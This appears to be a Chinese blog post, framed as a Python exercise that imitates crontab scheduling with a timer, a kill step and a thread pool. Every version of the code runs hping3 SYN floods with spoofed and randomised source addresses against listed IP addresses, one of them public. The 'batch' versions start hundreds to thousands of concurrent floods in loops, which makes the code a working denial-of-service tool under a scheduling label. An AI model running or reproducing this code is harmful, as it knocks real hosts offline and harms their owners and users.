Python模擬Linux的Crontab, 寫個任務計劃需求

Python模擬Linux的Crontab, 寫個任務計劃需求python

來具體點app

  

需求:
    執行一個程序, 程序一直是運行狀態, 這裏假設是一個函數

    當程序運行30s的時候, 須要終止程序, 能夠用python, c, c++語言實現

    擴展需求:
        當1分鐘之後, 須要從新啓動程序

def process_2():
    # 時間幾點執行
    # 執行process_1
    # 開始監聽--計時
    # 當時間超過多少s之後, 強制結束
        #(注意進程裏面的任務執行進程是否還存在, 舉個例子, 進程的任務是在建立一個進程, 那強制結束的是任務的進程, 而你建立的進程呢?)
    pass

 

#!/usr/bin/env python
# -*- coding=utf-8 -*-


import sys, time, multiprocessing, datetime, os

# -----<自定義Error>----- #
class MyCustomError(Exception):
    def __init__(self, msg=None, retcode=4999):
        self.retcode = int(retcode)
        try:
            if not msg:
                msg = "Setting time is less than the current time Error. "
        except:
            msg = "Unknown Error!!!"
        Exception.__init__(self, self.retcode, msg)

# -----<格式化時間變成時間戳>----- #
class FormatDatetime():
    '''
    Use method:
        FormatDatetime.become_timestamp("2018-08-21 13:19:00")
    '''

    @staticmethod
    def become_timestamp(dtdt):
        # 將時間類型轉換成時間戳
        if isinstance(dtdt, datetime.datetime):
            timestamp = time.mktime(dtdt.timetuple())
            return timestamp

        elif isinstance(dtdt, str):
            if dtdt.split(" ")[1:]:
                a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d  %H:%M:%S")
                timestamp = time.mktime(a_datetime.timetuple())
            else:
                a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d")
                timestamp = time.mktime(a_datetime.timetuple())
            return timestamp

        elif isinstance(dtdt, float):
            return dtdt


# -----<計時器>----- #
def timer(arg):
    '''
    use method:
        timer(14)

    :param arg: 倒計時時間
    :return: True
    '''
    # 倒計時時間
    back_time = arg
    while back_time != 0:
        sys.stdout.write('\r')  ##意思是打印在清空
        back_time -= 1
        sys.stdout.write("%s" % (int(back_time)))
        sys.stdout.flush()
        time.sleep(1)
    return True

# -----<自定義任務函數>----- #
class Tasks:
    @staticmethod
    def start():
        ip1 = "42.93.48.16"
        ip2 = "192.168.2.141"
        adjure = """hping3 -c 100000 -d 120 -S -w 64 -p 57511 -a 10.10.10.10 --flood --rand-source {}""".format(ip2)
        os.system(adjure)

    @staticmethod
    def stop():
        adjure = """netstat -anpo | grep hping3 | awk -F "[ /]+" '{print $7}' | xargs -i -t kill -9 {}"""
        os.system(adjure)


# -----<任務函數>----- #
def slow_worker():
    '''
    你的自定義任務, 須要執行的代碼
    :return:
    '''
    print('Starting worker')
    time.sleep(0.1)
    print('Finished worker')
    Tasks.start()


# -----<任務計劃執行時間>----- #
def crontab_time(custom_time):
    # custom_time = "2018-08-21 13:44:00"
    date_time = FormatDatetime.become_timestamp(custom_time)
    now_time = time.time()
    # 餘數, 有小數
    remainder_data = int(date_time - now_time)

    if remainder_data < 0:
        raise MyCustomError
    else:
        while remainder_data > 0:
            remainder_data -= 1
            time.sleep(1)
        return True


# -----<執行函數>----- #
def my_crontab(custom_time='', frequency=1, countdown=0):
    '''
    幾點幾分執行任務
    此函數屬於業務邏輯, 能夠考慮再次封裝
    custom_time = "2018-08-21 13:19:00" 時間格式必須是這樣
    frequency = 1 # 頻次
    countdown = 0 # 倒計時多少s
    :return:
    '''
    if custom_time:
        crontab_time_status = crontab_time(custom_time)
        if crontab_time_status:
            for i in range(frequency):
                p = multiprocessing.Process(target=slow_worker)
                p.start()
                if countdown:
                    status = timer(countdown)
                    if status:
                        p.terminate()
                        Tasks.stop()
    else:
        for i in range(frequency):
            p = multiprocessing.Process(target=slow_worker)
            p.start()
            if countdown:
                status = timer(countdown)
                if status:
                    p.terminate()
                    Tasks.stop()


if __name__ == '__main__':
    my_crontab(frequency=1, countdown=50)
View Code

 

若是是批量的呢?less

 

#!/usr/bin/env python
# -*- coding=utf-8 -*-
import queue
import threading
import contextlib
import sys, time, multiprocessing, datetime, os


# -----<自定義Error>----- #
class MyCustomError(Exception):
    def __init__(self, msg=None, retcode=4999):
        self.retcode = int(retcode)
        try:
            if not msg:
                msg = "Setting time is less than the current time Error. "
        except:
            msg = "Unknown Error!!!"
        Exception.__init__(self, self.retcode, msg)


# -----<格式化時間變成時間戳>----- #
class FormatDatetime():
    '''
    Use method:
        FormatDatetime.become_timestamp("2018-08-21 13:19:00")
    '''

    @staticmethod
    def become_timestamp(dtdt):
        # 將時間類型轉換成時間戳
        if isinstance(dtdt, datetime.datetime):
            timestamp = time.mktime(dtdt.timetuple())
            return timestamp

        elif isinstance(dtdt, str):
            if dtdt.split(" ")[1:]:
                a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d  %H:%M:%S")
                timestamp = time.mktime(a_datetime.timetuple())
            else:
                a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d")
                timestamp = time.mktime(a_datetime.timetuple())
            return timestamp

        elif isinstance(dtdt, float):
            return dtdt


# -----<計時器>----- #
def timer(arg):
    '''
    use method:
        timer(14)

    :param arg: 倒計時時間
    :return: True
    '''
    # 倒計時時間
    back_time = arg
    while back_time != 0:
        sys.stdout.write('\r')  ##意思是打印在清空
        back_time -= 1
        sys.stdout.write("%s" % (int(back_time)))
        sys.stdout.flush()
        time.sleep(1)
    return True


# -----<自定義任務函數>----- #
class Tasks:
    @staticmethod
    def start():
        ip1 = "42.93.48.16"
        ip2 = "192.168.2.141"  # 57511
        ip3 = "192.168.2.147"  # 8082
        adjure = """hping3 -c 100000 -d 120 -S -w 64 -p 57511 -a 10.10.10.10 --flood --rand-source {}""".format(ip2)
        os.system(adjure)

    @staticmethod
    def stop():
        adjure = """netstat -anpo | grep hping3 | awk -F "[ /]+" '{print $7}' | xargs -i -t kill -9 {}"""
        os.system(adjure)


# -----<任務函數>----- #
def slow_worker():
    '''
    你的自定義任務, 須要執行的代碼
    :return:
    '''
    print('Starting worker')
    time.sleep(0.1)
    print('Finished worker')
    Tasks.start()


# -----<任務計劃執行時間>----- #
def crontab_time(custom_time):
    # custom_time = "2018-08-21 13:44:00"
    date_time = FormatDatetime.become_timestamp(custom_time)
    now_time = time.time()
    # 餘數, 有小數
    remainder_data = int(date_time - now_time)

    if remainder_data < 0:
        raise MyCustomError
    else:
        while remainder_data > 0:
            remainder_data -= 1
            time.sleep(1)
        return True


# -----<執行函數>----- #
def my_crontab(custom_time='', frequency=1, countdown=20):
    '''
    幾點幾分執行任務
    此函數屬於業務邏輯, 能夠考慮再次封裝
    custom_time = "2018-08-21 13:19:00" 時間格式必須是這樣
    frequency = 1 # 頻次
    countdown = 0 # 倒計時多少s
    :return:
    '''
    if custom_time:
        crontab_time_status = crontab_time(custom_time)
        if crontab_time_status:
            for i in range(frequency):
                p = multiprocessing.Process(target=slow_worker)
                p.start()
                if countdown:
                    status = timer(countdown)
                    if status:
                        p.terminate()
                        Tasks.stop()
    else:
        for i in range(frequency):
            p = multiprocessing.Process(target=slow_worker)
            p.start()
            if countdown:
                status = timer(countdown)
                if status:
                    p.terminate()
                    Tasks.stop()


StopEvent = object()


# -----<線程池>----- #
class ThreadPool(object):
    def __init__(self, max_num):
        self.q = queue.Queue()
        self.max_num = max_num

        self.terminal = False
        self.generate_list = []
        self.free_list = []

    def run(self, func, args, callback=None):
        """
        線程池執行一個任務
        :param func: 任務函數
        :param args: 任務函數所需參數
        :param callback: 任務執行失敗或成功後執行的回調函數,回調函數有兩個參數一、任務函數執行狀態;2、任務函數返回值(默認爲None,即:不執行回調函數)
        :return: 若是線程池已經終止,則返回True不然None
        """

        if len(self.free_list) == 0 and len(self.generate_list) < self.max_num:
            self.generate_thread()
        w = (func, args, callback,)
        self.q.put(w)

    def generate_thread(self):
        """
        建立一個線程
        """
        t = threading.Thread(target=self.call)
        t.start()

    @contextlib.contextmanager
    def worker_state(self, xxx, val):
        xxx.append(val)
        try:
            yield
        finally:
            xxx.remove(val)

    def call(self):
        """
        循環去獲取任務函數並執行任務函數
        """
        current_thread = threading.currentThread
        self.generate_list.append(current_thread)

        event = self.q.get()
        while event != StopEvent:

            func, arguments, callback = event
            try:
                result = func(*arguments)
                status = True
            except Exception as e:
                status = False
                result = e

            if callback is not None:
                try:
                    callback(status, result)
                except Exception as e:
                    pass

            if self.terminal:  # False
                event = StopEvent
            else:
                # self.free_list.append(current_thread)
                # event = self.q.get()
                # self.free_list.remove(current_thread)
                with self.worker_state(self.free_list, current_thread):
                    event = self.q.get()
        else:
            self.generate_list.remove(current_thread)

    def close(self):
        num = len(self.generate_list)
        while num:
            self.q.put(StopEvent)
            num -= 1

    # 終止線程(清空隊列)
    def terminate(self):

        self.terminal = True

        while self.generate_list:
            self.q.put(StopEvent)
        self.q.empty()


if __name__ == '__main__':

    pool = ThreadPool(20)

    for item in range(200):
        pool.run(func=my_crontab, args=('', 1, 20))

    pool.terminate()
批量

 

#!/usr/bin/env python
# -*- coding=utf-8 -*-
import queue
import threading
import contextlib
import sys, time, multiprocessing, datetime, os


# -----<自定義Error>----- #
class MyCustomError(Exception):
    def __init__(self, msg=None, retcode=4999):
        self.retcode = int(retcode)
        try:
            if not msg:
                msg = "Setting time is less than the current time Error. "
        except:
            msg = "Unknown Error!!!"
        Exception.__init__(self, self.retcode, msg)


# -----<格式化時間變成時間戳>----- #
class FormatDatetime():
    '''
    Use method:
        FormatDatetime.become_timestamp("2018-08-21 13:19:00")
    '''

    @staticmethod
    def become_timestamp(dtdt):
        # 將時間類型轉換成時間戳
        if isinstance(dtdt, datetime.datetime):
            timestamp = time.mktime(dtdt.timetuple())
            return timestamp

        elif isinstance(dtdt, str):
            if dtdt.split(" ")[1:]:
                a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d  %H:%M:%S")
                timestamp = time.mktime(a_datetime.timetuple())
            else:
                a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d")
                timestamp = time.mktime(a_datetime.timetuple())
            return timestamp

        elif isinstance(dtdt, float):
            return dtdt


# -----<計時器>----- #
def timer(arg):
    '''
    use method:
        timer(14)

    :param arg: 倒計時時間
    :return: True
    '''
    # 倒計時時間
    back_time = arg
    while back_time != 0:
        sys.stdout.write('\r')  ##意思是打印在清空
        back_time -= 1
        sys.stdout.write("%s" % (int(back_time)))
        sys.stdout.flush()
        time.sleep(1)
    return True


# -----<自定義任務函數>----- #
class Tasks:
    @staticmethod
    def start():
        ip1 = "42.93.48.16" # 8008,8088
        ip2 = "192.168.2.141"  # 57511
        ip3 = "192.168.2.147"  # 8082
        adjure2 = """hping3 -c 500000 -d 120 -S -w 64 -p 57511 -a 10.10.10.10 --flood --rand-source {}""".format(ip2)
        adjure3 = """hping3 -c 500000 -d 120 -S -w 64 -p 8072 -a 10.10.10.10 --flood --rand-source {}""".format(ip3)
        adjure1 = """hping3 -c 500000 -d 120 -S -w 64 -p 8082 -a 10.10.10.10 --flood --rand-source {}""".format(ip1)
        os.system(adjure2)

    @staticmethod
    def stop():
        adjure = """netstat -anpo | grep hping3 | awk -F "[ /]+" '{print $7}' | xargs -i -t kill -9 {}"""
        os.system(adjure)


# -----<任務函數>----- #
def slow_worker():
    '''
    你的自定義任務, 須要執行的代碼
    :return:
    '''
    print('Starting worker')
    time.sleep(0.1)
    print('Finished worker')
    Tasks.start()


# -----<任務計劃執行時間>----- #
def crontab_time(custom_time):
    # custom_time = "2018-08-21 13:44:00"
    date_time = FormatDatetime.become_timestamp(custom_time)
    now_time = time.time()
    # 餘數, 有小數
    remainder_data = int(date_time - now_time)

    if remainder_data < 0:
        raise MyCustomError
    else:
        while remainder_data > 0:
            remainder_data -= 1
            time.sleep(1)
        return True


# -----<執行函數>----- #
def my_crontab(custom_time='', frequency=1, countdown=20):
    '''
    幾點幾分執行任務
    此函數屬於業務邏輯, 能夠考慮再次封裝
    custom_time = "2018-08-21 13:19:00" 時間格式必須是這樣
    frequency = 1 # 頻次
    countdown = 0 # 倒計時多少s
    :return:
    '''
    if custom_time:
        crontab_time_status = crontab_time(custom_time)
        if crontab_time_status:
            for i in range(frequency):
                p = multiprocessing.Process(target=slow_worker)
                p.start()
                if countdown:
                    status = timer(countdown)
                    if status:
                        p.terminate()
                        Tasks.stop()
    else:
        for i in range(frequency):
            p = multiprocessing.Process(target=slow_worker)
            p.start()
            if countdown:
                status = timer(countdown)
                if status:
                    p.terminate()
                    Tasks.stop()


StopEvent = object()


# -----<線程池>----- #
class ThreadPool(object):
    def __init__(self, max_num):
        self.q = queue.Queue()
        self.max_num = max_num

        self.terminal = False
        self.generate_list = []
        self.free_list = []

    def run(self, func, args, callback=None):
        """
        線程池執行一個任務
        :param func: 任務函數
        :param args: 任務函數所需參數
        :param callback: 任務執行失敗或成功後執行的回調函數,回調函數有兩個參數一、任務函數執行狀態;二、任務函數返回值(默認爲None,即:不執行回調函數)
        :return: 若是線程池已經終止,則返回True不然None
        """

        if len(self.free_list) == 0 and len(self.generate_list) < self.max_num:
            self.generate_thread()
        w = (func, args, callback,)
        self.q.put(w)

    def generate_thread(self):
        """
        建立一個線程
        """
        t = threading.Thread(target=self.call)
        t.start()

    @contextlib.contextmanager
    def worker_state(self, xxx, val):
        xxx.append(val)
        try:
            yield
        finally:
            xxx.remove(val)

    def call(self):
        """
        循環去獲取任務函數並執行任務函數
        """
        current_thread = threading.currentThread
        self.generate_list.append(current_thread)

        event = self.q.get()
        while event != StopEvent:

            func, arguments, callback = event
            try:
                result = func(*arguments)
                status = True
            except Exception as e:
                status = False
                result = e

            if callback is not None:
                try:
                    callback(status, result)
                except Exception as e:
                    pass

            if self.terminal:  # False
                event = StopEvent
            else:
                # self.free_list.append(current_thread)
                # event = self.q.get()
                # self.free_list.remove(current_thread)
                with self.worker_state(self.free_list, current_thread):
                    event = self.q.get()
        else:
            self.generate_list.remove(current_thread)

    def close(self):
        num = len(self.generate_list)
        while num:
            self.q.put(StopEvent)
            num -= 1

    # 終止線程(清空隊列)
    def terminate(self):

        self.terminal = True

        while self.generate_list:
            self.q.put(StopEvent)
        self.q.empty()


if __name__ == '__main__':
    pool = ThreadPool(10)

    for i in range(1, 100):

        for item in range(3000):
            pool.run(func=my_crontab, args=('', 1, 60))
        time.sleep(5 * 0.5)
    pool.terminate()


    os.system("ps -aux | grep aa.py |grep -v grep | awk '{print $2}' | xargs -i -t kill -9 {}")
再次改進後
相關文章
相關標籤/搜索